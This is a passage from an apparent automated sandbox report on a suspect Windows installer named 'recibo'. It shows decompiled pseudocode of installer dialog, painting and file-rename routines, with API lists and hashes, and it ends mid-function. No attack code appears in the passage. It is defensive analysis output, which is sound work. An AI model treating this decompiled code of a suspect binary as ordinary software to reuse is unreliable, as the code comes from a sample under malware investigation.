								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004044CE(_v12);
								L93:
								return E00404500(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}



























































                                                                                  0x00404f0d
                                                                                  0x00404f26
                                                                                  0x00404f2b
                                                                                  0x00404f33
                                                                                  0x00404f39
                                                                                  0x00404f4f
                                                                                  0x00404f52
                                                                                  0x0040517d
                                                                                  0x00405184
                                                                                  0x00405198
                                                                                  0x00405186
                                                                                  0x00405188
                                                                                  0x0040518b
                                                                                  0x0040518c
                                                                                  0x00405193
                                                                                  0x00405193
                                                                                  0x004051a4
                                                                                  0x004051b2
                                                                                  0x004051b5
                                                                                  0x004051cb
                                                                                  0x00405240
                                                                                  0x00405243
                                                                                  0x00405245
                                                                                  0x0040524f
                                                                                  0x0040525d
                                                                                  0x0040525d
                                                                                  0x0040525f
                                                                                  0x00405269
                                                                                  0x0040526f
                                                                                  0x00405272
                                                                                  0x00405275
                                                                                  0x00405290
                                                                                  0x00405277
                                                                                  0x00405281
                                                                                  0x00405281
                                                                                  0x00405275
                                                                                  0x00405269
                                                                                  0x00000000
                                                                                  0x00405243
                                                                                  0x004051d0
                                                                                  0x004051db
                                                                                  0x004051e0
                                                                                  0x004051e7
                                                                                  0x004051ec
                                                                                  0x004051f0
                                                                                  0x004051fb
                                                                                  0x004051fb
                                                                                  0x004051ff
                                                                                  0x00405203
                                                                                  0x00405207
                                                                                  0x0040521a
                                                                                  0x00405209
                                                                                  0x00405209
                                                                                  0x00405210
                                                                                  0x00405216
                                                                                  0x00405212
                                                                                  0x00405212
                                                                                  0x00405212
                                                                                  0x00405210
                                                                                  0x0040521e
                                                                                  0x00405220
                                                                                  0x00405233
                                                                                  0x00405236
                                                                                  0x00405239
                                                                                  0x00405239
                                                                                  0x00405203
                                                                                  0x00000000
                                                                                  0x004051f0
                                                                                  0x004051d2
                                                                                  0x004051d9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405293
                                                                                  0x00405293
                                                                                  0x0040529a
                                                                                  0x0040530b
                                                                                  0x00405313
                                                                                  0x0040531b
                                                                                  0x0040531b
                                                                                  0x00405324
                                                                                  0x00405326
                                                                                  0x0040532d
                                                                                  0x00405330
                                                                                  0x00405330
                                                                                  0x00405336
                                                                                  0x0040533d
                                                                                  0x00405340
                                                                                  0x00405340
                                                                                  0x00405346
                                                                                  0x0040534c
                                                                                  0x00405352
                                                                                  0x00405352
                                                                                  0x0040535f
                                                                                  0x004054c0
                                                                                  0x004054c7
                                                                                  0x004054e4
                                                                                  0x004054ea
                                                                                  0x004054fc
                                                                                  0x004054fc
                                                                                  0x00000000
                                                                                  0x00405365
                                                                                  0x00405367
                                                                                  0x0040536c
                                                                                  0x00405371
                                                                                  0x00405376
                                                                                  0x00405378
                                                                                  0x00405378
                                                                                  0x00405379
                                                                                  0x0040537a
                                                                                  0x0040537c
                                                                                  0x0040537c
                                                                                  0x00405384
                                                                                  0x004053c5
                                                                                  0x004053c7
                                                                                  0x004053d7
                                                                                  0x004053da
                                                                                  0x004053df
                                                                                  0x004053e6
                                                                                  0x004053e9
                                                                                  0x0040548b
                                                                                  0x00405494
                                                                                  0x0040549c
                                                                                  0x0040549c
                                                                                  0x004054a2
                                                                                  0x004054aa
                                                                                  0x004054bb
                                                                                  0x004054bb
                                                                                  0x00000000
                                                                                  0x004054aa
                                                                                  0x004053ef
                                                                                  0x004053f2
                                                                                  0x004053f8
                                                                                  0x004053fd
                                                                                  0x004053ff
                                                                                  0x00405401
                                                                                  0x00405407
                                                                                  0x0040540e
                                                                                  0x00405413
                                                                                  0x0040541a
                                                                                  0x0040541d
                                                                                  0x0040541d
                                                                                  0x00405424
                                                                                  0x00405430
                                                                                  0x00405434
                                                                                  0x00405436
                                                                                  0x00405436
                                                                                  0x00405426
                                                                                  0x00405428
                                                                                  0x00405428
                                                                                  0x00405456
                                                                                  0x00405462
                                                                                  0x00405471
                                                                                  0x00405471
                                                                                  0x00405473
                                                                                  0x00405476
                                                                                  0x0040547f
                                                                                  0x00000000
                                                                                  0x00405386
                                                                                  0x00405391
                                                                                  0x00405394
                                                                                  0x00405399
                                                                                  0x0040539b
                                                                                  0x0040539f
                                                                                  0x004053af
                                                                                  0x004053b9
                                                                                  0x004053bb
                                                                                  0x004053be
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004053a1
                                                                                  0x004053a1
                                                                                  0x004053a7
                                                                                  0x004053a9
                                                                                  0x004053a9
                                                                                  0x004053aa
                                                                                  0x004053ab
                                                                                  0x00000000
                                                                                  0x004053a1
                                                                                  0x00405384
                                                                                  0x0040535f
                                                                                  0x004052a2
                                                                                  0x00000000
                                                                                  0x004052b8
                                                                                  0x004052c2
                                                                                  0x004052c7
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004052d9
                                                                                  0x004052de
                                                                                  0x004052ea
                                                                                  0x004052ea
                                                                                  0x004052ec
                                                                                  0x004052fb
                                                                                  0x004052fd
                                                                                  0x00405301
                                                                                  0x00405304
                                                                                  0x00000000
                                                                                  0x00405304
                                                                                  0x004052a2
                                                                                  0x00404f58
                                                                                  0x00404f5d
                                                                                  0x00404f66
                                                                                  0x00404f6d
                                                                                  0x00404f7f
                                                                                  0x00404f8a
                                                                                  0x00404f90
                                                                                  0x00404f9e
                                                                                  0x00404fb2
                                                                                  0x00404fb7
                                                                                  0x00404fc4
                                                                                  0x00404fc9
                                                                                  0x00404fdf
                                                                                  0x00404ff0
                                                                                  0x00404ffd
                                                                                  0x00404ffd
                                                                                  0x00405000
                                                                                  0x00405006
                                                                                  0x00405008
                                                                                  0x0040500b
                                                                                  0x00405010
                                                                                  0x00405015
                                                                                  0x00405017
                                                                                  0x00405017
                                                                                  0x00405037
                                                                                  0x00405037
                                                                                  0x00405039
                                                                                  0x0040503a
                                                                                  0x0040503f
                                                                                  0x00405045
                                                                                  0x00405049
                                                                                  0x0040504e
                                                                                  0x00405056
                                                                                  0x0040505a
                                                                                  0x0040505f
                                                                                  0x00405064
                                                                                  0x0040506c
                                                                                  0x0040506f
                                                                                  0x0040513f
                                                                                  0x00405152
                                                                                  0x00000000
                                                                                  0x00405075
                                                                                  0x00405078
                                                                                  0x0040507b
                                                                                  0x0040507e
                                                                                  0x0040507e
                                                                                  0x00405084
                                                                                  0x0040508d
                                                                                  0x00405090
                                                                                  0x00405094
                                                                                  0x00405097
                                                                                  0x0040509a
                                                                                  0x004050a3
                                                                                  0x004050ac
                                                                                  0x004050af
                                                                                  0x004050b2
                                                                                  0x004050b5
                                                                                  0x004050f3
                                                                                  0x0040511e
                                                                                  0x004050f5
                                                                                  0x00405104
                                                                                  0x00405104
                                                                                  0x004050b7
                                                                                  0x004050ba
                                                                                  0x004050c8
                                                                                  0x004050d2
                                                                                  0x004050da
                                                                                  0x004050e1
                                                                                  0x004050ec
                                                                                  0x004050ec
                                                                                  0x004050b5
                                                                                  0x00405124
                                                                                  0x00405125
                                                                                  0x00405131
                                                                                  0x00405131
                                                                                  0x0040513d
                                                                                  0x00405158
                                                                                  0x0040515b
                                                                                  0x00405178
                                                                                  0x00000000
                                                                                  0x0040515d
                                                                                  0x00405162
                                                                                  0x0040516b
                                                                                  0x004054fe
                                                                                  0x00405510
                                                                                  0x00405510
                                                                                  0x0040515b
                                                                                  0x00000000
                                                                                  0x0040513d
                                                                                  0x0040506f

                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404F29
                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                                                                  • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
                                                                                  • SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                                                                  • DeleteObject.GDI32(00000000), ref: 00405000
                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                                                    • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                                                                  • ShowWindow.USER32(?,00000005), ref: 00405162
                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                                                                  • GlobalFree.KERNEL32(?), ref: 00405340
                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                                                                  • ShowWindow.USER32(?,00000000), ref: 004054EA
                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                                                                                  • ShowWindow.USER32(00000000), ref: 004054FC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                  • String ID: $M$N
                                                                                  • API String ID: 2564846305-813528018
                                                                                  • Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                                  • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                                                                  • Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                                  • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00404658 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 92%
                                                                                  			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t111;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42b234 =  *0x42b234 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E00404500(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x432ea0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404907(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x434f08, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x434f08, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
						goto L27;
					} else {
						_t69 =  *0x42c240; // 0x5bcfcc
						_t29 = _t69 + 0x14; // 0x5bcfe0
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004048E3();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t111 =  *0x433edc; // 0x5c09b6
					_t75 =  *(_t111 - 4 + _t75 * 4);
				}
				_t76 =  *0x434f38 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404609;
				if(_t110 != 2) {
					_v8 = E004045CF;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404499(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404499(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004044CE(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x434f10 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x42b234 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x42b234 = 0;
				return 0;
			}




















                                                                                  0x0040466a
                                                                                  0x00404797
                                                                                  0x004047f4
                                                                                  0x004047f8
                                                                                  0x004048c5
                                                                                  0x004048c7
                                                                                  0x004048c7
                                                                                  0x004048cd
                                                                                  0x004048cd
                                                                                  0x004048d0
                                                                                  0x00000000
                                                                                  0x004048d7
                                                                                  0x00404806
                                                                                  0x0040480c
                                                                                  0x00404816
                                                                                  0x00404821
                                                                                  0x00404824
                                                                                  0x00404827
                                                                                  0x00404832
                                                                                  0x00404835
                                                                                  0x0040483c
                                                                                  0x00404849
                                                                                  0x0040485a
                                                                                  0x00404860
                                                                                  0x00404868
                                                                                  0x00404876
                                                                                  0x0040487c
                                                                                  0x0040487c
                                                                                  0x0040483c
                                                                                  0x00404886
                                                                                  0x00000000
                                                                                  0x00404891
                                                                                  0x00404895
                                                                                  0x004048a5
                                                                                  0x004048a5
                                                                                  0x004048ab
                                                                                  0x004048b7
                                                                                  0x004048b7
                                                                                  0x00000000
                                                                                  0x004048bb
                                                                                  0x00404886
                                                                                  0x004047a2
                                                                                  0x00000000
                                                                                  0x004047b4
                                                                                  0x004047b4
                                                                                  0x004047b9
                                                                                  0x004047b9
                                                                                  0x004047bf
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004047e8
                                                                                  0x004047ea
                                                                                  0x004047ef
                                                                                  0x00000000
                                                                                  0x004047ef
                                                                                  0x004047a2
                                                                                  0x00404670
                                                                                  0x00404673
                                                                                  0x00404678
                                                                                  0x0040467a
                                                                                  0x00404689
                                                                                  0x00404689
                                                                                  0x00404691
                                                                                  0x00404694
                                                                                  0x00404698
                                                                                  0x0040469b
                                                                                  0x0040469f
                                                                                  0x004046a2
                                                                                  0x004046a5
                                                                                  0x004046a8
                                                                                  0x004046af
                                                                                  0x004046b1
                                                                                  0x004046b1
                                                                                  0x004046bb
                                                                                  0x004046c8
                                                                                  0x004046d2
                                                                                  0x004046d7
                                                                                  0x004046da
                                                                                  0x004046df
                                                                                  0x004046f6
                                                                                  0x004046fd
                                                                                  0x00404710
                                                                                  0x00404713
                                                                                  0x00404727
                                                                                  0x0040472e
                                                                                  0x00404733
                                                                                  0x00404738
                                                                                  0x00404738
                                                                                  0x00404746
                                                                                  0x00404754
                                                                                  0x00404766
                                                                                  0x0040476b
                                                                                  0x0040477b
                                                                                  0x0040477d
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040470A
                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                                                                  • GetSysColor.USER32(?), ref: 00404738
                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                                                                  • lstrlenW.KERNEL32(?), ref: 00404759
                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 004047D4
                                                                                  • SendMessageW.USER32(00000000), ref: 004047DB
                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404806
                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                                                                                  • SetCursor.USER32(00000000), ref: 0040485A
                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                                                                                  • SetCursor.USER32(00000000), ref: 00404876
                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                  • String ID: Call$N
                                                                                  • API String ID: 3103080414-3438112850
                                                                                  • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                  • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                                                                  • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                  • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 90%
                                                                                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x434f10;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                                                  0x0040100a
                                                                                  0x00401039
                                                                                  0x00401047
                                                                                  0x0040104d
                                                                                  0x00401051
                                                                                  0x0040105b
                                                                                  0x00401061
                                                                                  0x00401064
                                                                                  0x004010f3
                                                                                  0x00401089
                                                                                  0x0040108c
                                                                                  0x004010a6
                                                                                  0x004010bd
                                                                                  0x004010cc
                                                                                  0x004010cf
                                                                                  0x004010d5
                                                                                  0x004010d9
                                                                                  0x004010e4
                                                                                  0x004010ed
                                                                                  0x004010ef
                                                                                  0x004010ef
                                                                                  0x00401100
                                                                                  0x00401105
                                                                                  0x0040110d
                                                                                  0x00401110
                                                                                  0x00401112
                                                                                  0x00401118
                                                                                  0x0040111f
                                                                                  0x00401126
                                                                                  0x00401130
                                                                                  0x00401142
                                                                                  0x00401156
                                                                                  0x00401160
                                                                                  0x00401165
                                                                                  0x00401165
                                                                                  0x00401110
                                                                                  0x0040116e
                                                                                  0x00000000
                                                                                  0x00401178
                                                                                  0x00401010
                                                                                  0x00401013
                                                                                  0x00401015
                                                                                  0x0040101f
                                                                                  0x0040101f
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                  • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                  • String ID: F
                                                                                  • API String ID: 941294808-1304234792
                                                                                  • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                  • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                                                                                  • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                  • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00406183 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E00406183(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x430908 = 0x55004e;
				 *0x43090c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
						_t53 = _t52 + 0x10;
						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
						_t12 = E0040602D(0x431108, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
